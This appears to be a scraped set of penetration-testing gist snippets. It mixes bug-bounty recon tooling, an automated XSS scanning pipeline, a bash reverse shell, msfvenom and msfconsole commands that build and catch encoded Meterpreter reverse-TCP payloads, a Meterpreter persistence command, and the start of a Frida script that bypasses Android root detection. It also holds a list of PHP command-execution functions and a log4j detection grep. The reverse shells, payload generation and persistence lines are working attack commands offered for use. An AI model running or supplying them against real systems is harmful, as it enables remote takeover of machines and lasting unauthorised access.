https://github.com/arkadiyt/bounty-targets-data
http://www.asnlookup.com/
#cat targets_urls.txt
http://public-firing-range.appspot.com
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
#!/bin/bash | |
LIMIT=500 #number of cycles | |
for ((i=1; i <= LIMIT ; i++)) do | |
find . -name '*.rar' -exec unrar e {} \; -exec rm {} \; #rar file | |
#find . -name '*.7z' -exec 7za e {} \; -exec rm {} \; # 7z file | |
#find . -name '*.zip' -exec unzip {} \; -exec rm {} \; #zip file | |
done | |
#recursive file rar,zip,7z you can open the files with this script. | |
#Матрёшка,Matryoshka CTF |
python -c 'import pty; pty.spawn("/bin/sh")' | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe | |
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run" | |
run persistence -A -i 10 -p 6767 -r 192.168.0.24 |
{ | |
"proxy":{ | |
"ssl_pass_through":{ | |
"automatically_add_entries_on_client_ssl_negotiation_failure":false, | |
"rules":[ | |
{ | |
"enabled":true, | |
"host":".*\\.google\\.com", | |
"protocol":"any" | |
}, |
GREP NOT IP RESULT | |
cat file.txt| grep -Eov "\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" | |
grep -Eov "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" some_ip.txt | |
egrep -v '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}' file.txt | |
grep -v "[[:alpha:]]" some_url-ip.txt |egrep -v '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}' | |
grep -Eov "^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$" d.txt |
// $ frida -l antiroot.js -U -f com.example.app --no-pause | |
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
// - I added extra whitelisted items to deal with the latest versions | |
// of RootBeer/Cordova iRoot as of August 6, 2019 | |
// - The original one just fucked up (kill itself) if Magisk is installed lol | |
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
Java.perform(function() { | |
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log